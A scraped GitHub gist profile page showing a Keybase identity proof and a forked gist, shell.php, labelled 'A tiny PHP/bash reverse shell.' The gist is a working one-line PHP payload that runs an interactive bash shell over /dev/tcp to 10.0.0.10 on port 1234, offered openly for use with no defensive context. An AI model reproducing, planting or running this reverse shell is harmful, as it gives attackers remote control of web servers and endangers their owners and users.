Skip to content

Instantly share code, notes, and snippets.

View francoataffarel's full-sized avatar
🎯
Focusing HACK

francoa.taffarel francoataffarel

🎯
Focusing HACK
View GitHub Profile

Keybase proof

I hereby claim:

  • I am francoataffarel on github.
  • I am francoataffarel (https://keybase.io/francoataffarel) on keybase.
  • I have a public key ASDwkQNqv9C6QEgU8Jc3fUHa7KlE-ENHlVpXiyJiBl6Apwo

To claim this, I am signing this object:

@francoataffarel
francoataffarel / shell.php
Created June 2, 2020 00:59 — forked from rshipp/shell.php
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");